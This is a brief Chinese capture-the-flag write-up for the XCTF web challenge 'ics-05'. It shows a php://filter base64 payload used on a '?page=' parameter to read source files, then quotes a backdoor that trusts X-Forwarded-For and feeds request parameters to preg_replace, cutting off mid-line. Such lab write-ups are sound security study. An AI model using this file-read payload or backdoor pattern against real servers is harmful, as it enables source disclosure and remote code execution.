攻防世界web练习
ics-05
首先点击下发觉只有一个php界面,然后在点击,发觉有个?page=,尝试利用php伪协议读取源代码
?page=php://filter/read=convert.base64-encode/resource=index.php
读取解码后发觉后门
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace